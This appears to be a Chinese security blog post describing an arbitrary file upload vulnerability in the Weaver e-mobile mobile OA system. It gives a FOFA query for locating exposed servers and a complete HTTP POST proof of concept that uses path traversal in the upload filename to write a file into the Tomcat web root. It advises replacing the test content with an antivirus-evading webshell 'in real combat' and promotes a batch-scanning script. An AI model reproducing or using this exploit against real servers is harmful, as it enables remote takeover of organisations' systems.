一、漏洞描述

泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。

e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。该系统存任意文件上传漏洞,攻击者可通过此漏洞上传webshell木马远程控制服务器。

二、网络空间搜索引擎查询

fofa查询

title="移动管理平台-企业管理"

三、漏洞复现

POC

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1

Host: ip:port

Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36

Accept-Language: zh-CN,zh;q=0.9

Content-Length: 226

Expect: 100-continue

Connection: close

------WebKitFormBoundarymVk33liI64J7GQaK

Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/Check.txt"

This site has a vulnerability !!!

------WebKitFormBoundarymVk33liI64J7GQaK--

上传成功后访问

http://ip:port/Check.txt 如下:

实战中将上传内容换成免杀的webshell木马即可

三、漏洞检测

单个检测

python lang2sqlUpload.py -u url

批量检测

python lang2sqlUpload.py -f filename

关注微信公众号 网络安全透视镜 回复 20231107 获取批量检测脚本

推荐阅读

评论可见,请评论后查看内容,谢谢!!!
 您阅读本篇文章共花了: